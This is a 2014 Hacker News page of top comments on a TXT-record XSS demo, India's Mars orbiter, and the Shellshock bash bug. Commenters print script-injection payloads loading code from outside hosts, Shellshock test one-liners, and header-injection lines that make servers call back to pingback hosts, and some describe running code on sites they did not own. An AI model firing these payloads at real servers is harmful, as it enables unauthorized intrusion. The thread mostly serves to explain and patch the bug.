hacker news with inline top comments    .. more ..    26 Sep 2014 Best
home   ask   best   5 years ago   
TXT Record XSS
992 points by ryanskidmore  7 days ago   228 comments top 47
mrb 7 days ago 12 replies      
I am half serious, but how about making HTML served in TXT records a standard trick for serving small web pages very quickly? There are way fewer network round trips:

  1. DNS query for TXT record for example.com  2. DNS reply with HTML content
Compared with the traditional 7 steps:

  1. DNS query for A record for example.com  2. DNS reply with x.x.x.x  3. TCP SYN to port 80  4. TCP SYN/ACK  5. TCP ACK  6. HTTP GET  7. HTTP reply with HTML content
It would also make the content super-distributed, super-reliable, as DNS servers cache it worldwide (and for free so it would reduce hosting costs :D). Also TXT records can contain more than 255 bytes as long as they are split on multiple strings of 255 bytes in a DNS reply.

Again, I am only half serious, but this is an interesting thought experiment...

Edit: oddtarball: DNSSEC would solve spoofing. And updates should take no longer than the DNS TTL to propagate: the TTL is under your control; you could set it to 60 seconds if you wanted. It is a common, false misconception that many DNS resolvers ignore the TTL. Some large web provider (was it Amazon? I forget) ran an experiment and demonstrated that across tens or hundreds of thousands of clients wordlwide, 99% of them saw DNS updates propagated within X seconds if the TTL was set to X seconds. Only <1% of DNS resolvers were ignoring it.

ryan-c 7 days ago 4 replies      
I enumerated all IPv4 PTR records a few years back, and I saw a couple XSS things there as well. If anyone wants to host that data set somewhere, let me know, would be interesting to see what others do with it.

Edit: I found my data and have a grep running on it, will share what turns up.

Edit2: Somewhat less exciting than I remember:

$ fgrep -- '>' *










philip1209 7 days ago 4 replies      
I added FartScroll.js from the Onion to my text records:


SEJeff 7 days ago 1 reply      
From any Linux (or probably OS X) workstation / server, you can run the command "host -t TXT jaimehankins.co.uk" ie:

$ host -t TXT jamiehankins.co.uk

;; Truncated, retrying in TCP mode.

jamiehankins.co.uk descriptive text "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"

jamiehankins.co.uk descriptive text "v=spf1 include:spf.mandrillapp.com ?all"

jamiehankins.co.uk descriptive text "<script src='//peniscorp.com/topkek.js'></script>"

jamiehankins.co.uk descriptive text "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"

kehrlann 7 days ago 4 replies      
This is hilariousy, but could this potentially be a real threat to anything ?
ryanskidmore 6 days ago 1 reply      
Who.is have fixed it now, but you can still see it in action over at archive.org


AsakiIssa 7 days ago 2 replies      
Wasn't expecting that at all! Had several tabs opened and was really confused for a few seconds while I tried to find the tab with 'youtube on autoplay'.

Firefox needs to show the 'play' icon for the audio tag.

garazy 7 days ago 0 replies      
I've found about 80 TXT records with <script tags in them - most of them look like the person not understanding where to paste a JavaScript snippet over XSS attempts, here's all of them -


There's a few that are "13h.be/x.js" that look like someone trying this out before.

jedberg 7 days ago 1 reply      
Come on people, this is so basic. If you didn't generate the data, don't display it on your web page without filtering it. It blows my mind that this isn't just everyone's default.
rbinv 7 days ago 3 replies      
Clever. I didn't get it at first.

Never trust user input.

Edit: See http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehanki... for the actual code.

colinbartlett 7 days ago 0 replies      
Bravo, I just embarrassed myself in a very quiet meeting.
toddgardner 7 days ago 0 replies      
The most clever exploit of XSS I've ever seen. Beautiful. Bravo.
JamieH 6 days ago 0 replies      
Still working here if anyone is yet to see it.


Cance 18 hours ago 0 replies      
For more information, visit this site >>>>>>> http://getformulat10.com/
Sanddancer 7 days ago 0 replies      
Given how many whois sites cache results, I wonder how many of them are also vulnerable to SQL injections...
kazinator 7 days ago 1 reply      
Since there is very little discussion in the link, pardon me for stating what may be obvious to some, but not necessarily everyone.

The point here is that:

1. DNS TXT records can contain HTML, including scripts and whatever.

2. Domain registrants can publish arbitrary TXT records.

3. TXT records can appear in pages generated by web sites which serve, for instance, as portals for viewing domain registration information, including DNS records such as TXT records.

4. Thus, such sites are vulnerable to perpetrating cross-site-script attacks (XSS) on their visitors if they naively paste the TXT record contents into the surrounding HTML.

5. The victim is the user who executes a query which finds the malicious domain which serves up the malicious TXT record that is interpolated into the displayed results. The user's browser executes the malicious code.

Thus, when you are generating UI markup from pieces, do not trust any data that is pulled from any third-party untrusted sources, including seemingly harmless TXT records.

mike-cardwell 7 days ago 0 replies      
A while ago I experimented with adding stuff to the version.bind field in bind. Just updated it:

mike@glue:~$ dig +short chaos txt version.bind @

"<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>"

I put this in my named.conf:

version "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>";

This site is vulnerable:


Although takes a minute before it kicks in. I did report it to them at the time, but never got a response.

elwell 7 days ago 1 reply      
In playing around with this hack, I discovered that Dreamhost doesn't properly escape TXT records in their admin interface when modifying DNS records. I put an iframe in and it shows the box but the src is removed; it also killed the page at that point so I'm unable to remove it...
bwy 7 days ago 3 replies      
Wish there was a warning, because I accidentally clicked this link in class just now.
0x0 7 days ago 0 replies      
Can it be done with CNAME and SRV records too?
Thaxll 7 days ago 2 replies      
It has nothing to to do with TXT record, it's just the website that render html. It could be any source.
gsharma 7 days ago 0 replies      
Not sure how Trulia handles input for its usernames, but at one point I was able to do this http://www.trulia.com/profile/-iframe--home-buyer-loleta-ca-...
js2 7 days ago 0 replies      
All editors should, upon save, put up the following prompt:

"I acknowledge the code just written does not trust its input, under penalty of being whipped by a wet noodle."

But I guess folks would just click through.


sidcool 6 days ago 1 reply      
I opened this link on my Android's Chrome browser. The top search text input started wildly convulsing. First I thought the post was about that. But I didn't really get what this is about.
sanqui 7 days ago 1 reply      
Looks like the who.is site has patched the exploit up a few minutes ago.
gcr 7 days ago 0 replies      
Warning: this page links to (loud!) automatic playing audio.
tekknolagi 7 days ago 0 replies      
This is hysterical.
homakov 6 days ago 0 replies      
XSS on a shitty website not doing trivial sanitization gets 900 points on HN, oh guys you are disappointing me so much.
indielol 7 days ago 0 replies      
Wouldn't this make it super easy for Google to ban (show the security warnings in Chrome) the domains?
nerdy 7 days ago 0 replies      
Best POC ever.
_RPM 7 days ago 1 reply      
When I went to the page, it started playing music. I find that very frustrating and annoying.
bdpuk 7 days ago 0 replies      
I've seen similar examples with HTTP headers and sites that display those, nice angle.
general_failure 7 days ago 0 replies      
Well played sir, very well played
thomasfl 7 days ago 0 replies      
Finally somebody found a way to put html injection on to good use.
wqfeng 7 days ago 1 reply      
Could anyone tell me what's about? I just see a DNS page.
ginvok 7 days ago 0 replies      
Aaaand now I'm deaf :)Gotta learn sign language
tedchs 6 days ago 0 replies      
FYI it looks like who.is fixed the XSS bug.
iamwil 7 days ago 3 replies      
How does this work?
ing33k 7 days ago 0 replies      
good hack but really stupid of me to click it directly :\
PaulSec 7 days ago 0 replies      
I wonder how this got so much points..Reflected XSS in 2014, yeah..
himanshuy 7 days ago 1 reply      
What's up with the search box?
zobzu 7 days ago 0 replies      
That made me laugh, good one :)
notastartup 7 days ago 0 replies      
man...I woke up and got a dose of surprise....love this song.
r0m4n0 7 days ago 3 replies      
isn't this technically illegal to demonstrate haha?
st3fan 7 days ago 0 replies      
sprkyco 7 days ago 0 replies      
Luckily it does not work on my normal browser: https://www.whitehatsec.com/aviator/
ISRO Mars Orbiter Mission: Spacecraft successfully enters Martian Orbit
1009 points by skbohra123  1 day ago   153 comments top 44
noisy_boy 1 day ago 5 replies      
People who keep making the (nonsense) point of space vs. better roads keep harping on how the money will be better spent on infrastructure.

I looked up the Indian planning commission's budget for 2013-14 road development. Planning Commission provided an annual outlay of Rs.37,300.00 Crore for 2013-2014 for development in road sector[1]. That is more than 6 billion USD - just for improving roads, for a year.

The budget of the Mars Orbiter mission was around 75 million USD[2] i.e. less than 1.5% of [1].

[1]: http://www.performance.gov.in/sites/default/files/department...

[2]: http://www.forbes.com/sites/saritharai/2013/11/07/how-indias...

sidcool 1 day ago 6 replies      
I remember when in 2012, the then PM of India had declared this project. The entire internet community came together to deride this, saying it's not possible in a couple of years and that India had better feed its hungry etc.

I am a very proud Indian today. This achievement, like other by humanity (LHC in particular), will encourage me to push myself towards greatness.

suprgeek 1 day ago 4 replies      
What is even more commendable is that it was done pretty cheaply [1]. Granted the capabilities of some of the other craft are different - but not THAT different.Add to this the fact that this was a success in the first shot - getting a craft from the Earth to to Mars Orbit correctly in one shot on a meager budget is indeed a stunning success for ISRO.

[1] https://twitter.com/WSJIndia/status/514591179363864578/photo...

swatkat 1 day ago 2 replies      
MOM spacecraft was launched last year (5th Nov 2013) and today it entered into Martian orbit. Here's the twitter handle of spacecraft: https://twitter.com/MarsOrbiter

Mars Orbit Insertion was covered live on ISRO webcast (http://webcast.isro.gov.in/), Doordarshan National TV and other channels. Here's the complete coverage of MOI: https://www.youtube.com/watch?v=VZL_Vwy0JqI

MOI sequence of events: http://spaceflightnow.com/mars/mom/status.html

MOM carries five scientific payloads: http://www.isro.org/mars/payload.aspx

Expecting first set of colour pictures from MOM by today evening (IST) :)

realrocker 1 day ago 2 replies      
Not only did Mom reach Mars, she also got a pretty good bargain on it. So Indian :)
SoulMan 1 day ago 3 replies      
Given that HN is a more intellectual and educated group and there are no one here who is criticizing about the money spent . But the were skeptics who did criticize initially . It basically represents the sample of the population who probably never understood the meaning of space exploration. Most of them are partially educated or educated with a faulty system. It does not just apply to India, there are people sitting in US congress who thinks NASA is waste of money. Same people would have blamed ISRO for INSAT , GSLV & PSLV back in the days where there were bunch of satellite already doing the similar work. Its only because of those ISRO efforts today we have own geo-censing and satellite communication without having to buy from external agencies or compromise our security .
pdevr 1 day ago 1 reply      
Twitter handle of ISRO's Mars Orbiter: https://twitter.com/MarsOrbiter

First tweet:"What is red, is a planet and is the focus of my orbit?"

corford 1 day ago 0 replies      
Successful Mars orbit for 0.42% of the price Facebook paid for Whatsapp.

Awesome job and glad ISRO doesn't seem to suffer from the same bad luck the Russians do when it comes to Mars!

gordon_freeman 1 day ago 1 reply      
Great news for India's space program especially considering INR4.54 billion (US$74 million) cost for an interplanetary mission like this, it should be a crash course in frugal space engineering. I really believe ISRO can form a close partnership with NASA in future to launch supply to ISS and much more.
vs4vijay 1 day ago 2 replies      
Hollywood movie Gravity costs more than this space mission.
zkirill 1 day ago 2 replies      
It is so incredibly inspiring to listen to a PM speak about space, science, research and exploration for more than an hour. Does anyone know if this is broadcast on Indian national TV?
roywiggins 1 day ago 0 replies      
This is massively inspiring. Huge PR boon for India, and they obviously deserve it.

Super happy about this. Welcome to the interplanetary club!

nitin_flanker 1 day ago 2 replies      
I really want that people around the world should stop saying that this is a cheap mission. Instead you can say that this one is economical mission.

Saying it cheap is derogatory remark. ISRO was thrifty while spending funds on this mission.

andystannard 11 hours ago 0 replies      
Amazing well done! Sounds like they chose very wisely the scope of the mission and came up with a useful goal that they could archive with the limited resources. Lets hope they get some useful data from the methane detector
prithvitheprime 1 day ago 0 replies      
It was lowest priced spacecraft ever sent to Mars; Congrats India (big move on creating low priced space shuttles)
r0muald 1 day ago 0 replies      
I didn't see anyone compare this success at first attempt with the (partial) failure of Jade Rabbit https://news.ycombinator.com/item?id=7226307 however that seems a more interesting comparison between newcomers to space exploration rather than, say, NASA missions.
bharath28 1 day ago 0 replies      
Respect. For sheer aplomb & perseverance. It is moments like these that make me want to put my head down and march on no matter what.
kjs3 1 day ago 0 replies      
Congrats, India. Welcome to the club. Hopefully you'll have many more successes.
girvo 1 day ago 0 replies      
What an amazing achievement! And what a retro looking website! Congrats to the team, this is something to be proud of.
alphakappa 1 day ago 0 replies      
The odds were against them, and yet they managed to pull this off on the first try. Congratulations ISRO!http://www.bbc.com/news/world-asia-india-29307123
chdir 1 day ago 0 replies      
Previous discussion on the budget : https://news.ycombinator.com/item?id=7964261
vivekchand19 8 hours ago 0 replies      
Congrats ISRO :)
nmridul 1 day ago 0 replies      
Title should be "India's mars orbiter ..... "
return0 1 day ago 0 replies      
I 'm surprised it's not discussed here ... but the ones who should be worried here is SpaceX, not NASA.
skbohra123 1 day ago 0 replies      
Webcast of the event can be seen here http://webcast.isro.gov.in/
lmm 1 day ago 0 replies      
Does anyone maintain an up-to-date version of the Mars Scorecard? What's Earth's average for this decade?
mukundmr 1 day ago 0 replies      
I hope events like this will help rekindle the interest in science and that ISRO gets a budget boost.
murukesh_s 1 day ago 1 reply      
NASA - Do you want to Outsource? ;-)
jamesmalvi 1 day ago 0 replies      
Proud to be indian.. Well Done India... I hope we get the best out of this trip
gude 1 day ago 0 replies      
That's one giant interplanetary leap for India
bane 1 day ago 0 replies      
Absolutely amazing, congratulations India!
pranayairan 1 day ago 0 replies      
Awesome achievement, go go go.
kamakazizuru 1 day ago 0 replies      
cue haters talking about lack of toilets/education/too much rape/other random social issue that exists in India they heard about that one time in the news - and how India should fix that instead of developing technology...in 5..4..3..2..1
shashikant52004 1 day ago 0 replies      
Congrats team india!!!
gauthamilango 1 day ago 0 replies      
Congrats ISRO!!!!!
jpatel3 1 day ago 0 replies      
Its a proud moment!
nagarch 1 day ago 0 replies      
Simply Amazing...
arc_of_descent 1 day ago 0 replies      
digifire 1 day ago 0 replies      
I just wish ISRO was a privately held like spacex and giving it a run for its money. You would get the students in India really inspired to learn real engineering.
general_failure 1 day ago 0 replies      
Congrats India!

In other news, http://isro.gov.in/ has a <blink> tag :) Some parts of ISRO aren't catching up with technology :))

jacko0 1 day ago 2 replies      
Well Done! But $74 Million could have been spent giving toilets to Indians, so that don't have to shit in the streets.
seesomesense 1 day ago 0 replies      
Good practice for ICBM development.

India's current IRBMs can target all of China.The goal is to be able to target all of the mainland United States.

CVE-2014-6271: Remote code execution through bash
888 points by vault_  1 day ago   392 comments top 63
daveloyall 1 day ago 1 reply      
There's some misunderstanding of how the one-liner works, so here's a writeup.

You can break the one-liner into two lines to see what is happening.

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"    3. bash: warning: badvar: ignoring function definition attempt    4. bash: error importing function definition for `badvar'    5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

And now the same two input lines on and OLD bash:

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"    3. vulnerable    4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)

jimrandomh 1 day ago 3 replies      
If you are responsible for the security of any system, this is your immediate, drop-everything priority. The technical details of the exploit mean that new ways of exploiting it will be discovered soon. Precedent suggests that automated systematic attacks against every server on the Internet will be coming, on a time scale of hours.
andrew13 1 day ago 5 replies      
It might still be an issue. The patches may not have done enough.

$ env X='() { (a)=>\' sh -c "echo date"; cat echo


env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("

cft 1 day ago 4 replies      
Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:

  #assume that your sources are in /src  cd /src  wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz  #download all patches  for i in $(seq -f "%03g" 0 25); do wget     http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done  tar zxvf bash-4.3.tar.gz   cd bash-4.3  #apply all patches  for i in $(seq -f "%03g" 0 25);do patch -p0 < ../bash43-$i; done  #build and install  ./configure && make && make install
Not sure if Ubuntu 8.04 with custom built bash will be upgradable to 10.04??

masterleep 1 day ago 2 replies      
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

From https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

JoshTriplett 1 day ago 3 replies      
Is it just me, or are the patches "fixing" the vulnerability woefully insufficient? With the patch, bash stops executing the trailing code, but it still allows defining arbitrary shell functions from environment variables. So, even though the patch fixes the ability to exploit this via SSH_ORIGINAL_COMMAND or HTTP_*, anything that can set environment variables can still override an arbitrary command. (Note that privileged environments typically filter out attempts to set PATH, LD_LIBRARY_PATH, and so on.)

This applies even if your shell script or shell snippet uses the full paths to commands. For instance:

    $ env '/sbin/foo'='() { echo exploit; }' bash -c '/sbin/foo'    exploit

antocv 1 day ago 2 replies      
Funny, this works even after bash fix / upgrade

env X='() { (a)=>\' sh -c "echo date"; cat e

From http://seclists.org/oss-sec/2014/q3/672

userbinator 1 day ago 1 reply      
According to http://wiki.bash-hackers.org/syntax/basicgrammar it appears that this is because bash allows functions to be exported through environment variables into subprocesses, but the code to parse those function definitions seems to be the same used to parse regular commands (and thus execute them).

Edit: after a brief glance over the affected code, this might not be so easy to patch completely - the actual method where everything interesting starts to take place is initialize_shell_variables in variables.c and parse_and_execute() in builtins/evalstring.c, so parsing and execution happen together; this is necessary to implement the shell grammar and is part of what makes it so powerful, but it can also be a source of vulnerabilities if it's not used carefully. I suppose one attempt at fixing this could be to separate out the function parsing code into its own function, one which can't ever cause execution of its input, and use that to parse function definitions in environment variables. This would be a pretty easy and elegant thing to do with a recursive-descent parser, but bash uses a lex/yacc-generated one to consume an entire command at once...

However, all in all I'm not so sure this ability to export funcdefs is such a good idea - forking a subshell automatically inherits the functions in the parent, and if it's a shell that wasn't created in such a manner, if it needs function definitions it can read them itself from some other source. This "feature" also means environment variables cannot start with the string '() {' (and exactly the string '() {' - even removing the space between those characters, e.g. '(){', doesn't trigger it) without causing an error in any subprocess - violating the usual assumption that environment variables can hold any arbitrary string. It might be a rare case, but it's certainly a cause for surprise.

agwa 1 day ago 4 replies      
It is a very good thing that Debian and Ubuntu use /bin/dash for /bin/sh by default, since /bin/sh is implicitly invoked all over the place (e.g. by system(3)). Distros which use /bin/bash for /bin/sh are gonna have a bad time.

Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.

jingo 22 hours ago 0 replies      
A quick fix would be to stop using bash.

I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.

There's no reason webservers have to use bash by default.

Sysadmins might need a hefty shell will lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.

I'm glad the systems I use do not have bash installed by default. The only time I ever use it is when a software author tries to force me to use bash by writing their install scripts in it and using bash-isms so the script will not run with a simpler shell like a BSD /bin/sh.

khaki54 1 day ago 1 reply      
So I took a great unix/linux systems programming class, http://sites.fas.harvard.edu/~lib215/ where you learn about all of the system software that you take for granted. Among other things, we had to write our own shell. There is an awful lot to consider, and most of it you are just trying to get to work properly. With regard to security, you feel like you are protected for the most part because the shell resides in userland and it's basically understood that you shouldn't trust foreign shell scripts.

Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.

Eclyps 1 day ago 3 replies      
Amazon's Linux distro for EC2 is still waiting for a patch.

EDIT: Finally got things updated. Bulletin can be found here: https://alas.aws.amazon.com/ALAS-2014-418.html

If yum isn't finding the update, try running "yum clean all" and then "yum update bash"

_wmd 1 day ago 1 reply      
As an example of who might be impacted, since openssh preserves the original command line passed to the ssh server when authenticating a public key that has a fixed command associated in authorized_keys, GitHub and BitBucket security teams are probably both having a really exciting day.
flebron 1 day ago 2 replies      
Maybe I'm doing something wrong, but I just tested it in ZSH (5.0.5, Linux) and the same vulnerable behavior seems to show up.
Zweihander 1 day ago 1 reply      
why-el 1 day ago 1 reply      
Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.
h43k3r 1 day ago 1 reply      
I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that, the link using which I ran the code is of a .gov site.

This thing seriously needs to be patched asap. Update your systems now.

m4r71n 1 day ago 0 replies      
Some more information was just posted to oss-sec:


Oculus 1 day ago 4 replies      
Have big security vulnerabilities been cropping up more often recently or does it seem that way because I've started to pay attention?
MBlume 1 day ago 3 replies      
I'm a bit confused about how to properly patch my mac.

Homebrew installs upgraded bash to /usr/local/bin/bash, everyone says what I should do is run 'chsh -s /usr/local/bin/bash' but if I have a script that has a /bin/bash hashbang at the top, won't it still use the vulnerable bash install?

I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.

ecze 1 day ago 2 replies      
With this bug, bash access to CiscoCallmanager is possible... Tested and working....
AnimalMuppet 1 day ago 1 reply      
Off topic:

This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.

0x0 1 day ago 2 replies      
The currently published fix is claimed to be incomplete: https://twitter.com/taviso/status/514887394294652929
BenjaminCoe 1 day ago 1 reply      
Wanted to share the simple Ansible script we used to patch CVE-2014-6271 at npm: https://github.com/npm/ansible-bashpocalypse
gwillem 1 day ago 3 replies      
This is quite stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com' 
Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.

iuguy 1 day ago 3 replies      
My OSX Mavericks install appears to be affected:

  foom:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  vulnerable  this is a test

AntiRush 1 day ago 1 reply      
It seems like the current patch might not be a complete fix:


throwaway49152 1 day ago 2 replies      
What would be the best way to go if using Debian 5 (lenny)?

The only service exposed is ssh, and no one outside the company has an account. Is it still vulnerable through ssh?

detectify 13 hours ago 0 replies      
We just released a complete quick-test for #shellshock here: https://shellshock.detectify.com/. It's free to use and here's the information about how the scanner works: goo.gl/8vp6eo

Please feedback here: https://news.ycombinator.com/item?id=8366643

deathanatos 21 hours ago 0 replies      
From just a functionality standpoint, how is even the patched version supposed to work? It seems to undefine the variable:

  % E='() { echo hi; }; echo cry' bash -c 'echo "-$E-"'  bash: warning: E: ignoring function definition attempt  bash: error importing function definition for `E'  --
Since everyone's favorite example seems to be CGI scripts, doesn't this result in the script having no variable, as opposed to just a text one? Suddenly the script can break because an expected variable is no longer present simply because the input had a certain odd looking form?

In fact, if I wanted my variable to be a function, why wouldn't I just explicitly eval it? What's the use case at all for this functionality?

milankragujevic 10 hours ago 0 replies      
Here's an easy to use and reliable scanner to test if your website is vulnerable. http://milankragujevic.com/projects/shellshock/
ilconsigliere 1 day ago 2 replies      
Am I wrong in thinking that seems a bit worse than Heartbleed?
sauere 1 day ago 1 reply      
No update out for Ubuntu Server 14.04 yet.

/edit: the Red Hat blog has a good overview https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

jtchang 1 day ago 0 replies      
For this to happen the attacker has to control environment variables and then a bash shell is spawned.

Lots of web stuff spawn shells setting environment variables to stuff in HTTP headers. LC_TIME with some time zone settings might be one.

detectify 1 day ago 0 replies      
We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.
saurabhnanda 1 day ago 0 replies      
Am I vulnerable if using the Paperclip gem to manage file uploads on a Rails app (it internally fires up 'convert' to generate thumbnails, I believe).

What if there is an haproxy sitting in front of the Rails app?

SchizoDuckie 1 day ago 0 replies      
I'm by no means an expert, but am I completely wrong if I think something like this should work on an exploitable system to get a pingback from a vulnerable system without curl ?

  curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://expoitablehost.com/blah.cgi

jdimov 1 day ago 1 reply      
All the explanations of why this is bad seem to involve CGI. Didn't the CGI interface die in the 90's? Who uses that nowadays?
korzun 1 day ago 2 replies      
FreeBSD appears to be affected.
kacy 1 day ago 0 replies      
Ubuntu has been patched, it appears. If you're on Ubuntu, try this:

sudo apt-get update

sudo apt-get --only-upgrade install bash

rurban 23 hours ago 0 replies      
What I'm really worried about now is every single cable modem and router out there, as they are very rarely updated. They run their shit for years. The bigger routers yes, but smaller ones and the modems not.
piratebroadcast 1 day ago 0 replies      
My friend tried it on Heroku - It is affected.
wyager 1 day ago 0 replies      
This is what happens when you have two different processes doing IPC using a human interface mechanism.

Another huge family of vulnerabilities that exists for the same reason are SQL injection vulnerabilities. SQL was invented as a way for humans at a terminal to do database operations. However, we started using it as a way of doing IPC. The problem with using human interfaces as an IPC mechanism is that human interfaces are rarely well-defined or minimal, so it is very hard to constrain behavior to what you expect.

The way to fix all of these bugs is to use well-defined, computer-oriented IPC mechanisms where there is a clear distinction between code and data. For example, database queries might be constructed by function call instead of string manipulation, which could pack them into a safe TLV format with no chance of malicious query injection. Generating web server content from a different language could be done via a proper FFI or message passing mechanism, rather than CGI scripts.

Sanddancer 1 day ago 3 replies      
Can someone with mod_security test a regex I wrote that should mitigate this? /\(.?\)\s\{.?\}\s\;/ from testing seems to catch any variants that I can think of that can trigger this bug, but I don't have a machine easily available to me at the moment to test with, unfortunately.
vhost- 1 day ago 0 replies      
For those of us with large clusters and chef, here is a useful knife command for updating bash on debian/ubuntu systems:

knife ssh 'name:*' 'sudo apt-get update && sudo apt-get install -y --only-upgrade bash'

kazinator 1 day ago 0 replies      
Passing executable code in environment variables is an incredibly bad idea.

The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.

The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.

But if this problem is closed, the issue remains that the attacker controls the environment variable; the malicious code can be put inside the function body. Even though it will not then be executed at definition time, perhaps some child or grand-child bash can be nevertheless goaded into calling the malicious function.

Basically this is a misfeature that must be rooted out, pardon the pun.

ck2 1 day ago 1 reply      

Another attack surface is OpenSSH through the use of AcceptEnv variables. As well through TERM and SSH_ORIGINAL_COMMAND. An environmental variable with an arbitrary name can carry a nefarious function which can enable network exploitation.

mirashii 1 day ago 0 replies      
At a glance, one interesting use of this is a potential local privilege escalation on systems with a sudoers file which restrict commands which can be run to ones that include a bash script, and allow you to keep some environment variables.
super_mario 1 day ago 4 replies      
Interestingly enough ancient BASH version 3.2 on Mac OS X 10.9.5 is not vulnerable:

    $ echo $BASH_VERSION    3.2.51(1)-release    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"    bash: warning: x: ignoring function definition attempt    bash: error importing function definition for `x'    this is a test    $
I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.

    $ echo $BASH_VERSION    4.3.25(1)-release    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"    bash: warning: x: ignoring function definition attempt    bash: error importing function definition for `x'    this is a test    $

kalops 1 day ago 4 replies      
so basically turn off AcceptEnv in sshd_config?
snissn 1 day ago 0 replies      
Here is a very simple proof of concept that helped me understand the vulnerability:

  bash-3.2$ anyvariable='() { true; }; echo foo' bash  foo

sauere 1 day ago 0 replies      
Also: i was not able to test it yet since i am still on the road, but i belive the Cisco AnyConnect VPN client OS-detection is affected
jacksoncage 1 day ago 0 replies      
Saved a lot of time again today with salt! $ salt * pkg.install bash refresh=Trueand then check for right version$ salt * pkg.version bash
jamiepenney 1 day ago 0 replies      
Looks like Raspian have updated their bash package with the fix, so my Raspberry Pi is safe.
FranOntanaya 1 day ago 0 replies      
Saucy wasn't patched by the time I did a do-release-upgrade a while ago.
pbrumm 1 day ago 0 replies      
Don't forget to update your docker containers and restart them.
ck2 1 day ago 3 replies      
Has the redhat patch been pushed through centos yet?
peterwwillis 1 day ago 1 reply      
Know what isn't vulnerable to this? Perl CGI scripts with taint mode enabled. http://perldoc.perl.org/perlsec.html#Taint-mode

  You may not use data derived from outside your program to affect something  else outside your program--at least, not by accident. All command line  arguments, environment variables, locale information (see perllocale),  results of certain system calls (readdir(), readlink(), the variable  of shmread(), the messages returned by msgrcv(), the password,  gcos and shell fields returned by the getpwxxx() calls), and all  file input are marked as "tainted".  Tainted data may not be used directly or indirectly in any command  that invokes a sub-shell, nor in any command that modifies files,  directories, or processes, with the following exceptions:

mmagin 1 day ago 0 replies      
The patch: ftp://ftp.cwru.edu/pub/bash/bash-4.3-patches/bash43-025
javert 1 day ago 3 replies      
So if a machine is not running a web server, does that mean that machine is not vulnerable?
piratebroadcast 1 day ago 1 reply      
Someone please ELI5 (Explain Like I'm 5)?
piratebroadcast 1 day ago 1 reply      
Free BashBleed logo for tech journalists - http://i.imgur.com/ilJbM74.png
zobzu 1 day ago 4 replies      
I have a feeling this is blown out of proportion.Who's running bash setuid exactly? Right.Who's running shell CGIs today? Right.

So.. who has an example of common scripts that are executed remotely in most servers while accepting remote environment? Til then, the panic seems unjustified...

I Had a Stroke at 33
597 points by Thevet  4 days ago   151 comments top 30
ohquu 4 days ago 2 replies      
What a beautiful article.

My girlfriend had three strokes, in succession, two years ago (when she was 22). The night before these strokes occurred, she had a transient ischemic attack (TIA). She began speaking gibberish to her friends. She texted me later that night explaining what happened. Her friends had laughed about it because they thought she was just acting like a goofball. I had no idea these were signs of a TIA, but I told her that if it happened again she needed to go to the doctor immediately.

The next day, the right side of her body went numb. This time, she was around people who noticed something was wrong, and she was immediately rushed to the emergency room. By the next day, I had flown a thousand miles (from the location of my new job) to be with her. She couldn't remember many words. She couldn't read a clock. She did not know the answer to 3 + 0.

It turned out that, similar to the author of this article, clots had traveled through the hole in her heart and up to her brain. Luckily, she recovered fully and was back to her old self within about a month. She had surgery to fix the PFO a couple months later. The neurologist told her that nine times out of ten, the clot travels a different path, and the victim is left dead or braindead. I am so lucky. Writing about this has me in big tears.

I am going to stop writing and go hug her now.

weddpros 4 days ago 5 replies      
